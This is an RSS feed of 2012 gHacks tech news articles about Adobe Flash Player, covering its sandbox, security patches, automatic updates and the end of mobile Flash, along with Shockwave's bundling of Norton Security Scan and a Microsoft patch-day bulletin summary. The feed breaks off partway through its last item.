<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
> <channel><title>gHacks Technology News &#124; Latest Tech News, Software And Tutorials &#187; Adobe</title> <atom:link href="http://www.ghacks.net/category/companies/adobe-companies/feed/" rel="self" type="application/rss+xml" /><link>http://www.ghacks.net</link> <description>A technology news blog covering software, mobile phones, gadgets, security, the Internet and other relevant areas.</description> <lastBuildDate>Sat, 11 Feb 2012 21:54:04 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <atom:link rel="hub" href="http://pubsubhubbub.appspot.com"/><atom:link rel="hub" href="http://superfeedr.com/hubbub"/> <item><title>Latest Flash Player Preview Adds Protected Mode Features For Firefox</title><link>http://www.ghacks.net/2012/02/07/latest-flash-player-preview-adds-protected-mode-features-for-firefox/</link> <comments>http://www.ghacks.net/2012/02/07/latest-flash-player-preview-adds-protected-mode-features-for-firefox/#comments</comments> <pubDate>Tue, 07 Feb 2012 08:13:42 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Browsing]]></category> <category><![CDATA[Firefox]]></category> <category><![CDATA[flash player]]></category> <category><![CDATA[sandbox]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=57043</guid> <description><![CDATA[Popular web browser plugins like Flash Player or Java are a prime target of malware and hackers. The core reasons are simple: Lack of centralized updating and little to no protection of the underlying system if the plugin has been compromised. Changes have been introduced, but only in select browsers at this point of time. [...]]]></description> <content:encoded><![CDATA[<p>Popular web browser plugins like Flash Player or Java are a prime target of malware and hackers. The core reasons are simple: Lack of centralized updating and little to no protection of the underlying system if the plugin has been compromised.</p><p>Changes have been introduced, but only in select browsers at this point of time. Google Chrome for instance uses sandboxing technology and automatic updates to keep users secure. The global updater that other web browsers use on the other hand is not nearly as thorough when it comes to downloading and applying updates as soon as they get released.</p><p>Adobe today has released a new Flash preview version for the Windows operating system that contains a new feature for the Firefox web browser.</p><p>Flash Player Protected Mode aims to limit the impact of Flash based attacks in Firefox on Windows systems. The new Flash Player feature is compatible with Firefox 4.0+ on Windows Vista or higher. Only a 32-bit version of the Flash Player release is available for download.</p><p>The security mode is automatically enabled when users view Flash Player files in the Firefox web browser. Flash contents are executed in a restricted environment that prevents attacks from reaching the operating system or other applications. It is basically a sandbox comparable with Google Chrome&#8217;s sandboxing technology, Protected Mode in Adobe Reader, and Protected View in Office 2010.</p><p>Firefox users running the new version will notice that two processes are started whenever Flash contents are accessed in the web browser with Protected Mode enabled.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2012/02/flash-player-incubator.jpg"><img
src="http://www.ghacks.net/wp-content/uploads/2012/02/flash-player-incubator.jpg" alt="flash player incubator" title="flash player incubator" width="406" height="455" class="alignnone size-full wp-image-57045" /></a></p><p>Adobe notes that these are the &#8220;broker and sandbox&#8221; processes which only run if Protected Mode is enabled. These are child processes of the <a
href="http://www.ghacks.net/2010/06/25/what-is-the-process-plugin-container-exe/">plugin-container.exe</a> process if enabled in the browser. Plugin-Container adds crash protection to the browser.</p><p>The Flash Player Protected Mode version for the Firefox browser has known issues. On 64-bit Windows systems for instance, a right-click on Flash contents causes Firefox to hang. Here is the list of known issues.</p><ul><li>Flash Access support is not enabled in this build.</li><li>Secure Sockets are not working in this build. (3101130)<br
/> Open and Save dialogs can hang in Windowless Mode (3096944)</li><li>Camera streams fail to play back when encoded with the H.264/AVC codecs (3096918)</li><li>On 64-bit Windows, Right-Clicking Flash Content cases Firefox to hang (3096953)</li><li>Custom context menus and clipboard copy does not work (3096977)</li><li>Local Security Dialogs are not displayed (3096714)<br
/> When printing to &#8220;Microsoft XPS Document Writer&#8221;, the &#8220;Save File As&#8221; dialog is always minimized (3096958)<br
/> Some Stage3D content may cause Adobe Flash Player to exit silently (#3049089)</li><li>Closing a SecureSocket connection may block Adobe Flash Player execution and result in timeout (#3045631)</li><li>Camera fails to play back when camera stream is being encoded with H264/AVC codec (#3049298)</li><li>IME may not be active in Windows Vista at times between browser sessions (#3055127)</li><li>In SandBox Stand-Alone Player, some menu items in the Microsoft IME language bar do not respond to mouse clicks (2947549)</li><li>Some Windows function keys such as F5 may prevent the Japanese IME candidate box to pop up (#3055096</li></ul><p>Adventurous Firefox users find the Flash Player Incubator preview release over at <a
href="http://labs.adobe.com/technologies/flashplatformruntimes/incubator/">Adobe Labs</a>.</p><p>A final release version of the new Flash plugin version moves the Firefox browser security wise closer to Google Chrome.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2012/02/07/latest-flash-player-preview-adds-protected-mode-features-for-firefox/feed/</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>Adobe Shockwave Player Now Installs Norton Security Scan</title><link>http://www.ghacks.net/2012/01/25/adobe-shockwave-player-now-installs-norton-security-scan/</link> <comments>http://www.ghacks.net/2012/01/25/adobe-shockwave-player-now-installs-norton-security-scan/#comments</comments> <pubDate>Wed, 25 Jan 2012 10:00:33 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[norton security scan]]></category> <category><![CDATA[shockwave]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=56412</guid> <description><![CDATA[Bundling third party applications with your own software is not a new thing on the Internet. It is for instance quite common that you see the Ask Toolbar, Babylon Toolbar, or any other toolbar added to software installations. Users who do not pay attention to the installation are then not only installing the software they [...]]]></description> <content:encoded><![CDATA[<p>Bundling third party applications with your own software is not a new thing on the Internet. It is for instance quite common that you see the <a
href="http://www.ghacks.net/2011/03/04/ask-toolbar-removal-how-to-uninstall/">Ask Toolbar</a>, <a
href="http://www.ghacks.net/2011/08/17/how-to-uninstall-the-babylon-toolbar-completely/">Babylon Toolbar</a>, or any other toolbar added to software installations. Users who do not pay attention to the installation are then not only installing the software they want on their system, but also software they do not want. To make matters worse, it usually is not that easy to get rid of the latter.</p><p>The popular download portal <a
href="http://www.ghacks.net/2011/08/17/the-cnet-download-com-installer/">Download.com</a> for instance has also started to bundle adware with the majority of downloads they provide site users with.</p><p>Today when I was downloading the latest Adobe Shockwave Player from Adobe&#8217;s website I noticed that both the slim online installer and full installer were now offering to install a third party application as well.</p><p>Near the end of the installation you are taken to a screen that will install Norton Security Scan on the system if you do not opt-out of it.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2012/01/norton-security-scan.jpg"><img
src="http://www.ghacks.net/wp-content/uploads/2012/01/norton-security-scan.jpg" alt="norton security scan" title="norton security scan" width="529" height="346" class="alignnone size-full wp-image-56414" /></a></p><p>Norton Security Scan is a free program that checks computers for potential threats. It will download the latest definition updates to the system when an online connection is available. The program detects but does not resolve the issues though. It in fact very similar to scareware in this regard, which alerts the user of serious problems on the PC to sell a product.</p><p>You can only scan the system after launch. Initiating a scan will first check for updates. You will also be notified if security and web protection is installed on the system. Only tracking cookies were detected on the system, which did not keep the program from displaying a big Fix Now button on the left side of the screen. When you press it you are taken directly to a web page where you can purchase one of Norton&#8217;s security programs.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2012/01/your-computer-is-at-risk.jpg"><img
src="http://www.ghacks.net/wp-content/uploads/2012/01/your-computer-is-at-risk-600x405.jpg" alt="your computer is at risk" title="your computer is at risk" width="600" height="405" class="alignnone size-medium wp-image-56417" /></a></p><p>Removal of Norton Security Scan is straightforward though. Just click on Start Menu > Control Panel > Uninstall a Program and select it for uninstallation. You need to restart the PC to complete the installation.</p><p>Looking for free alternatives that you can make use of right away? Try <a
href="http://www.ghacks.net/2011/09/01/avg-anti-virus-free-2012/">AVG Anti-Virus Free</a> or <a
href="http://www.avira.com/en/avira-free-antivirus">Avira Free Antivirus</a>, but keep in mind that they too may be bundling their programs with <a
href="http://www.ghacks.net/2011/06/29/beware-avira-partners-with-ask-and-uniblue/">toolbars</a>.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2012/01/25/adobe-shockwave-player-now-installs-norton-security-scan/feed/</wfw:commentRss> <slash:comments>15</slash:comments> </item> <item><title>Adobe Releases Another Flash Security Update</title><link>http://www.ghacks.net/2011/11/10/adobe-releases-another-flash-security-update/</link> <comments>http://www.ghacks.net/2011/11/10/adobe-releases-another-flash-security-update/#comments</comments> <pubDate>Thu, 10 Nov 2011 21:59:09 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[adobe flash]]></category> <category><![CDATA[flash]]></category> <category><![CDATA[flash update]]></category> <category><![CDATA[flash vulnerability]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=52572</guid> <description><![CDATA[A security update for Adobe Flash Player has been released today that fixes several critical security vulnerabilities that Adobe identified in the software. Affected by vulnerabilities are all desktop versions of Adobe Flash Player 11.0.1.152 and earlier for Windows, Apple Macintosh, Linux and Solaris as well as Adobe Flash Player 11.0.1.153 or earlier versions for [...]]]></description> <content:encoded><![CDATA[<p>A security update for Adobe Flash Player has been released today that fixes several critical security vulnerabilities that Adobe identified in the software. Affected by vulnerabilities are all desktop versions of Adobe Flash Player 11.0.1.152 and earlier for Windows, Apple Macintosh, Linux and Solaris as well as Adobe Flash Player 11.0.1.153 or earlier versions for the Android operating system. Adobe Air 3.0 and earlier are also affected by the security vulnerabilities.</p><p>Flash users are asked to visit the About Flash page to <a
href="http://www.adobe.com/software/flash/about/">check</a> the Flash version installed on their computer.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2011/11/adobe-flash-security-update.jpg"><img
src="http://www.ghacks.net/wp-content/uploads/2011/11/adobe-flash-security-update-600x274.jpg" alt="adobe flash security update" title="adobe flash security update" width="600" height="274" class="alignnone size-medium wp-image-52573" /></a></p><p>It is alternatively possible to right-click on Flash content to see the Flash Player version in the context menu.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2011/11/adobe-flash-version.jpg"><img
src="http://www.ghacks.net/wp-content/uploads/2011/11/adobe-flash-version-600x365.jpg" alt="adobe flash version" title="adobe flash version" width="600" height="365" class="alignnone size-medium wp-image-52574" /></a></p><p>Adobe recommends to update Flash Player to the newest version 11.1.102.55 by downloading it <a
href="http://get.adobe.com/flashplayer/">from</a> Adobe&#8217;s Flash Player Download Center. Is it alternatively possible to <a
href="http://www.ghacks.net/2011/10/04/adobe-releases-flash-player-11-air-3/">download Flash offline installers</a> from the linked guide. Android users can update Flash by downloading the latest version from Android Market on their Android device. Google Chrome users do not need to run the update manually as it is automatically installed by the browser.</p><p>The security patch fixes several memory corruption, buffer overflow and stack overflow vulnerabilities in Adobe Flash Player that attackers could exploit to cause a crash on the system running Adobe Flash technologies. Code execution could then give the attacker control of the affected system.</p><p>Interested users can read the security bulletin<a
href="http://www.adobe.com/support/security/bulletins/apsb11-28.html"> over at</a> the Adobe website. It offers additional information about each vulnerability found and download links to various technologies affected by the vulnerabilities.</p><p>The next big Flash release (that is Adobe Flash 11.2) will introduce automatic silent updates on Windows. This means that it will become more comfortable for Windows users to keep their installed version of Flash up to date on their system. See <a
href="http://www.ghacks.net/2011/11/01/flash-player-11-2-introduces-automatic-updates/">Flash Player 11.2 Introduces Automatic Updates</a> for details.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/11/10/adobe-releases-another-flash-security-update/feed/</wfw:commentRss> <slash:comments>7</slash:comments> </item> <item><title>Adobe Discontinue Flash for Mobile Devices</title><link>http://www.ghacks.net/2011/11/09/adobe-discontinue-flash-for-mobile-devices/</link> <comments>http://www.ghacks.net/2011/11/09/adobe-discontinue-flash-for-mobile-devices/#comments</comments> <pubDate>Wed, 09 Nov 2011 19:26:28 +0000</pubDate> <dc:creator>Mike Halsey MVP</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[adobe]]></category> <category><![CDATA[flash]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=52520</guid> <description><![CDATA[The world has been wondering what the next move would be in the stand-off between HTML5 and Adobe&#8217;s Flash Player.  Apple has always resisted Flash on the iPhone and iPad demonstrating that it runs slowly on the Mac and citing security concerns, many of which are valid.  Despite this Flash still has many fans and [...]]]></description> <content:encoded><![CDATA[<p>The world has been wondering what the next move would be in the stand-off between HTML5 and Adobe&#8217;s Flash Player.  Apple has always resisted Flash on the iPhone and iPad demonstrating that it runs slowly on the Mac and citing security concerns, many of which are valid.  Despite this Flash still has many fans and didn&#8217;t appear to be losing any traction.  This is despite Microsoft&#8217;s announcement that the new Metro version of IE10 for Windows 8 would be HTML5 all the way and not support any plug-ins at all.</p><p>Now though Adobe have signalled the beginning of the end for Flash by announcing that they are to discontinue development of the Flash player for Blackberry and Android devices.  In a press release the company signalled their the future would be HTML5 and their existing AIR runtime environment.</p><blockquote><p>Our future work with Flash on mobile devices will be focused on enabling Flash developers to package native apps with Adobe AIR for all the major app stores. We will no longer adapt Flash Player for mobile devices to new browser, OS version or device configurations. Some of our source code licensees may opt to continue working on and releasing their own implementations. We will continue to support the current Android and PlayBook configurations with critical bug fixes and security updates.</p><p>Over the past two years, we&#8217;ve delivered Flash Player for mobile browsers and brought the full expressiveness of the web to many mobile devices<em><em>.</em></em></p><p>However, HTML5 is now universally supported on major mobile devices, in some cases exclusively. This makes HTML5 the best solution for creating and deploying content in the browser across mobile platforms.</p><p>We will no longer continue to develop Flash Player in the browser to work with new mobile device configurations chipset, browser, OS version, etc.) following the upcoming release of Flash Player 11.1 for Android and BlackBerry PlayBook.</p></blockquote><p><img
class="alignleft" src="http://www.ghacks.net/wp-content/uploads/2011/11/flash.jpg" alt="" width="198" height="162" />People&#8217;s feelings over this announcement will be mixed.  All of Adobe&#8217;s products have been criticised for having lax security over the years and Flash was no exception to this.  It was difficult to disagree with Apple&#8217;s decision not to allow Flash on their iOS operating system, no matter how much we might have liked the plug-in itself.</p><p>Flash, which was born FutureSplash, has become the bedrock of video and interactivity online.  Quite simply it is the only plug-in to have ever reached nearly 100% adoption.</p><p>Questions will also be raised over the future of Flash for OS X and Windows.  It is very likely that these too will be discontinued before too long, and probably before the launch of Windows 8.</p><p>What the future of the web will now look like with HTML5 and scripting replacing the compiled code of the SWF file format remians to be seen.  Many popular websites have been shying away from Flash in recent years to return to more traditional interface types.  It is possible that the withdrawal of Flash from the Internet won&#8217;t even be noticed as websites such as YouTube complete their transition to true HTML5.</p><p>This does mean that devices that have been waiting for the arrival of Flash, including Windows Phone, will now never see it and can begin the full move to HTML5 in earnest; Windows Phone now has an HTML5 browser with the latest update.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/11/09/adobe-discontinue-flash-for-mobile-devices/feed/</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>Flash Player 11.2 Introduces Automatic Updates</title><link>http://www.ghacks.net/2011/11/01/flash-player-11-2-introduces-automatic-updates/</link> <comments>http://www.ghacks.net/2011/11/01/flash-player-11-2-introduces-automatic-updates/#comments</comments> <pubDate>Tue, 01 Nov 2011 14:37:31 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[adobe flash]]></category> <category><![CDATA[adobe flash player]]></category> <category><![CDATA[adobe flash player update]]></category> <category><![CDATA[adobe flash security]]></category> <category><![CDATA[flash player]]></category> <category><![CDATA[flash update]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=52210</guid> <description><![CDATA[If you are not running Google Chrome as your one and only browser on your PC system, you are probably tired of having to update Adobe&#8217;s Flash Player regularly to protect the system from security vulnerabilities. This could change soon with the release of Adobe&#8217;s Flash Player 11.2. The new version of Flash, currently available [...]]]></description> <content:encoded><![CDATA[<p>If you are not running Google Chrome as your one and only browser on your PC system, you are probably tired of having to update Adobe&#8217;s Flash Player regularly to protect the system from security vulnerabilities. This could change soon with the release of Adobe&#8217;s Flash Player 11.2. The new version of Flash, currently available as a beta download at Adobe Labs, introduces a technology called Flash Player Background Updater.</p><p>The auto-updater is only provided for Windows systems in Flash 11.2. Windows users who install Flash Player 11.2 or later will see the following prompt after the successful installation.</p><p><a
href="http://www.ghacks.net/wp-content/uploads/2011/11/adobe-flash-player-automatic-updates.jpg"><img
src="http://www.ghacks.net/wp-content/uploads/2011/11/adobe-flash-player-automatic-updates.jpg" alt="adobe flash player automatic updates" title="adobe flash player automatic updates" width="481" height="388" class="alignnone size-full wp-image-52211" /></a></p><p>It reads:</p><blockquote><p>Security updates and enhancements are periodically released for Adobe Flash Player that can be downloaded and installed automatically.</p><p>Choose your update method:</p><ul><li>Install updates automatically when possible (recommended)</li><li>Notify me when updates are available</li><li>Never check for updates (not recommended)</li></ul></blockquote><p>The first option checks for and installs Flash Player versions automatically on the operating system. Depending on the Flash version installed, this may include one (Internet Explorer version or other browser version) or even both versions if both are installed on the system.</p><p>The second option will perform the same checks for new versions. Instead of installing new versions automatically it will inform the user instead.</p><p>Flash Player will check for updates once per hour if the first or second option are selected. Adobe notes that users need to restart their web browser after an update has been installed to use the new version of Flash Player in the web browser.</p><p>The latest version of Adobe Flash Player 11.2 is <a
href="http://labs.adobe.com/downloads/flashplayer11-2.html">available</a> on the Adobe Labs download page. The installer is provided for all 32-bit and 64-bit operating systems that support Adobe Flash. The very same page offer downloads for the Flash Player uninstaller for 32-bit and 64-bit systems to uninstall the test version from the system again.</p><p>The update checks for new Flash versions are added as a Windows task so that no update program is running all the time on the computer system. It is likely that this new security feature will decrease the number of successful Flash player based attacks on Windows significantly. (<a
href="http://techdows.com/2011/11/flash-player-background-update.html?utm_source=feedburner&#038;utm_medium=feed&#038;utm_campaign=Feed%3A+Techdows+%28techdows%29">via</a>)</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/11/01/flash-player-11-2-introduces-automatic-updates/feed/</wfw:commentRss> <slash:comments>12</slash:comments> </item> <item><title>Adobe Releases Flash Player 11, Air 3</title><link>http://www.ghacks.net/2011/10/04/adobe-releases-flash-player-11-air-3/</link> <comments>http://www.ghacks.net/2011/10/04/adobe-releases-flash-player-11-air-3/#comments</comments> <pubDate>Tue, 04 Oct 2011 09:44:48 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[adobe]]></category> <category><![CDATA[adobe air]]></category> <category><![CDATA[adobe flash player]]></category> <category><![CDATA[flash player]]></category> <category><![CDATA[flash player 11]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=51131</guid> <description><![CDATA[Adobe software today has released the final versions of Adobe Flash Player 11 and Adobe Air 3. Probably the biggest feature of Flash Player 11 is hardware accelerated graphics rendering support through Stage 3D. Adobe states that the new technology improves rendering times by a factor of up to a 1000 times over Flash Player [...]]]></description> <content:encoded><![CDATA[<p>Adobe software today has released the final versions of Adobe Flash Player 11 and Adobe Air 3. Probably the biggest feature of Flash Player 11 is hardware accelerated graphics rendering support through Stage 3D. Adobe states that the new technology improves rendering times by a factor of up to a 1000 times over Flash Player 10. This new rendering speed allows for &#8220;console-quality&#8221; games on the Flash platform, according to Adobe who published two sample videos that demonstrate the capabilities of the new version of Flash.</p><p>You can watch both videos below:</p><p><iframe
width="560" height="315" src="http://www.youtube.com/embed/uYgOxzQ6bNU" frameborder="0" allowfullscreen></iframe></p><p><iframe
width="560" height="315" src="http://www.youtube.com/embed/szaXvTsoeVs" frameborder="0" allowfullscreen></iframe></p><p>They both certainly look impressive. Another important feature of Flash Player 11 is native 64-bit support which previously was not available at all, if you discount the Flash Player 11 Beta phase that is. The release furthermore offers theater-quality HD video and high quality HD video conferencing.</p><h3>Flash Online Installation</h3><p>Users of supported operating systems and browsers can install Flash online <a
href="http://get.adobe.com/flashplayer/">from</a> Adobe&#8217;s website. This installer should work for everyone except Chrome users who are automatically updated to the newest Flash version whenever it is released.</p><p><img
src="http://www.ghacks.net/wp-content/uploads/2011/10/adobe-flash-player-11.jpg" alt="adobe flash player 11" title="adobe flash player 11" width="600" height="549" class="alignnone size-full wp-image-51136" /></p><h3>Flash 11 Offline Installers</h3><p>Not every user can install Flash from Adobe&#8217;s website, for instance if the computer that Flash needs to be installed on has no direct Internet connection. Some users prefer offline installers as well.</p><p>The following links point to the Flash 11 offline installers on the Adobe website. You can download those to install them on one or multiple systems.</p><ul><li>Microsoft Windows: Internet Explorer <a
href="http://fpdownload.macromedia.com/pub/flashplayer/current/licensing/win/install_flash_player_11_active_x_32bit.exe">32-bit</a>, <a
href="http://fpdownload.macromedia.com/pub/flashplayer/current/licensing/win/install_flash_player_11_active_x_64bit.exe">64-bit</a> &#8211; Web browsers <a
href="http://fpdownload.macromedia.com/pub/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe">32-bit</a>, <a
href="http://fpdownload.macromedia.com/pub/flashplayer/current/licensing/win/install_flash_player_11_plugin_64bit.exe">64-bit</a></li><li>Apple Macintosh: 32-bit, 64-bit</li><li>Linux: <a
href="http://fpdownload.macromedia.com/pub/flashplayer/current/licensing/linux/flash-plugin-11.1.102.55-release.i386.rpm">32-bit</a>, <a
href="http://fpdownload.macromedia.com/pub/flashplayer/current/licensing/linux/flash-plugin-11.1.102.55-release.x86_64.rpm">64-bit</a></li></ul><p>Adobe Air users can download and install the latest version <a
href="http://get.adobe.com/air/">from the</a> Adobe website.</p><p>Interested users find announcements of the new releases both on the Flash Player <a
href="http://blogs.adobe.com/flashplayer/2011/10/adobe-flash-player-11-air-11-available-later-today.html">Team Blog</a> and the Flash Platform <a
href="http://blogs.adobe.com/flashplatform/2011/09/announcing-flash-player-11-and-air-3.html">Blog</a> which are both hosted on the Adobe website.</p><p>Both announcements link to additional pages that offer details about some of the new technologies included in Flash Player 11 and Adobe Air 3.</p><p>You can check which version of Adobe Flash you have installed by visiting Adobe&#8217;s <a
href="http://www.adobe.com/software/flash/about/">About page</a> on their website. (<a
href="http://techdows.com/2011/10/flash-player-11-offline-installer.html">via</a>)</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/10/04/adobe-releases-flash-player-11-air-3/feed/</wfw:commentRss> <slash:comments>10</slash:comments> </item> <item><title>Adobe Flash Player Security Update Available</title><link>http://www.ghacks.net/2011/09/22/adobe-flash-player-security-update-available/</link> <comments>http://www.ghacks.net/2011/09/22/adobe-flash-player-security-update-available/#comments</comments> <pubDate>Thu, 22 Sep 2011 08:57:19 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[adobe]]></category> <category><![CDATA[adobe flash player]]></category> <category><![CDATA[flash player]]></category> <category><![CDATA[flash player security]]></category> <category><![CDATA[flash player update]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=50719</guid> <description><![CDATA[Adobe yesterday evening released a security patch for Adobe Flash Player that fixes several critical security vulnerabilities. Affected are all versions of Adobe Flash Player 10.3.183.7 and earlier for all supported operating systems (Windows, Macintosh, Linux, Solaris) as well as Adobe Flash Player 10.3.186.6 and earlier for the Android operating system. According to Adobe, attackers [...]]]></description> <content:encoded><![CDATA[<p>Adobe yesterday evening released a security patch for Adobe Flash Player that fixes several critical security vulnerabilities. Affected are all versions of Adobe Flash Player 10.3.183.7 and earlier for all supported operating systems (Windows, Macintosh, Linux, Solaris) as well as Adobe Flash Player 10.3.186.6 and earlier for the Android operating system.</p><p>According to Adobe, attackers could use the vulnerabilities to exploit a crash to potentially take control of the attacked system. At least one of the vulnerabilities has already been detected in recent attacks, which makes the update mandatory and important on all systems. The attack is carried out over email, but Adobe points out that it can also be carried out on any website on the Internet.</p><p>The attacker basically tries to convince the user to click on a specifically prepared link to execute the attack on the user&#8217;s local computer system.</p><p>Adobe obviously recommends to update Adobe Flash Player as soon as possible to the latest version that fixes the discovered security issues.</p><p>Adobe Flash users can check their version of Adobe Flash Player on the about page over at <a
href="http://www.adobe.com/software/flash/about/">Adobe</a>.</p><p><img
src="http://www.ghacks.net/wp-content/uploads/2011/09/adobe-flash-player-version.jpg" alt="adobe flash player version" title="adobe flash player version" width="600" height="514" class="alignnone size-full wp-image-50721" /></p><p>Google Chrome users are the only ones who do not have to manually update Flash Player, as it is done automatically by Google Update.</p><p>Everyone else can download the most recent version of Adobe Flash Player from Adobe&#8217;s Download Center. Please note that you need to close your web browser during the installation process. Make sure that you uncheck the &#8220;Yes, install Google Chrome &#8211; optional&#8221; box on the download page unless you want to install Google Chrome as well.</p><p>You can alternatively download offline installers from the following links: for Microsoft&#8217;s Internet Explorer <a
href="http://www.ghacks.net/2011/10/04/adobe-releases-flash-player-11-air-3/">here</a>, for Firefox, Opera and other browsers here.</p><p>You can access the changelog <a
href="http://kb2.adobe.com/cps/901/cpsid_90194.html#main_10.3.183.10">here</a>. It lists all previous changes in Flash Player 10.3 and known issues among other things.</p> ]]></content:encoded> <wfw:commentRss>http://www.ghacks.net/2011/09/22/adobe-flash-player-security-update-available/feed/</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>Microsoft, Adobe Ready Security Updates</title><link>http://www.ghacks.net/2011/09/13/microsoft-adobe-ready-security-updates/</link> <comments>http://www.ghacks.net/2011/09/13/microsoft-adobe-ready-security-updates/#comments</comments> <pubDate>Tue, 13 Sep 2011 18:34:06 +0000</pubDate> <dc:creator>Martin Brinkmann</dc:creator> <category><![CDATA[Adobe]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[Windows]]></category> <category><![CDATA[adobe update]]></category> <category><![CDATA[microsoft patch day]]></category> <category><![CDATA[security bulletin]]></category> <category><![CDATA[windows-update]]></category> <guid
isPermaLink="false">http://www.ghacks.net/?p=50399</guid> <description><![CDATA[It is the second Tuesday of the month again and this means security patch day at Microsoft and Adobe. Adobe has just released a security bulletin for Adobe Reader and Acrobat that fix several critical vulnerabilities in versions of the pdf software. Vulnerabilities affect Adobe Reader X and earlier versions for Windows and Macintosh, Adobe [...]]]></description> <content:encoded><![CDATA[<p>It is the second Tuesday of the month again and this means security patch day at Microsoft and Adobe. Adobe has just released a security bulletin for Adobe Reader and Acrobat that fix several critical vulnerabilities in versions of the pdf software.</p><p>Vulnerabilities affect Adobe Reader X and earlier versions for Windows and Macintosh, Adobe Reader 9.4.2 and earlier for Unix, and Adobe Acrobat 10.1 and earlier for Windows and Macintosh.</p><p>Adobe as usually recommends to update Adobe Reader to the new version released today. This is Adobe Reader 10.1.1 for Windows and Macintosh, and Adobe Raeder 9.4.5 for Unix, as well as Adobe Acrobat 10.1.1 for Windows and Macintosh.</p><p>The security bulletin <a
href="http://www.adobe.com/support/security/bulletins/apsb11-24.html">offers</a> vulnerability details and download links for all Adobe Reader and Acrobat updates.</p><p>Microsoft today has released five security bulletins that affect Microsoft Windows, Microsoft Server Software and Microsoft Office. The maximum severity of all five bulletins is Important, the second highest rating available.</p><p><img
src="http://www.ghacks.net/wp-content/uploads/2011/09/windows-updates.png" alt="windows-updates" title="windows-updates" width="592" height="329" class="alignnone size-full wp-image-50410" /></p><p>Windows Update is already picking up the updates online. Windows users can check for updates in their operating system to download and install the patches right now.</p><p>You find summaries for all five bulletins below. Follow the link for detailed descriptions of each security bulletin.</p><ul><li><a
href="http://technet.microsoft.com/en-us/security/bulletin/ms11-070">MS11-070</a> &#8211; Vulnerability in WINS Could Allow Elevation of Privilege (2571621) &#8211; This security update resolves a privately reported vulnerability in the Windows Internet Name Service (WINS). The vulnerability could allow elevation of privilege if a user received a specially crafted WINS replication packet on an affected system running the WINS service. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability.</li><li><a
href="http://technet.microsoft.com/en-us/security/bulletin/ms11-071">MS11-071</a> &#8211; Vulnerability in Windows Components Could Allow Remote Code Execution (2570947) &#8211; This security update resolves a publicly disclosed vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user opens a legitimate rich text format file (.rtf), text file (.txt), or Word document (.doc) that is located in the same network directory as a specially crafted dynamic link library (DLL) file. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.</li><li><a
href="http://technet.microsoft.com/en-us/security/bulletin/ms11-072">MS11-072</a> &#8211; Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2587505) &#8211; This security update resolves five privately reported vulnerabilities in Microsoft Office. The vulnerabilities could allow remote code execution if a user opens a specially crafted Excel file. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Installing and configuring Office File Validation (OFV) to prevent the opening of suspicious files blocks the attack vectors for exploiting the vulnerabilities described in CVE-2011-1986 and CVE-2011-1987.</li><li><a
href="http://technet.microsoft.com/en-us/security/bulletin/ms11-073">MS11-073</a> &#8211; Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634) &#8211; This security update resolves two privately reported vulnerabilities in Microsoft Office. The vulnerabilities could allow remote code execution if a user opens a specially crafted Office file or if a user opens a legitimate Office file that is located in the same network directory as a specially crafted library file. An attacker who successfully exploited either of the vulnerabilities could gain the same user rights as the logged on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.</li><li><a
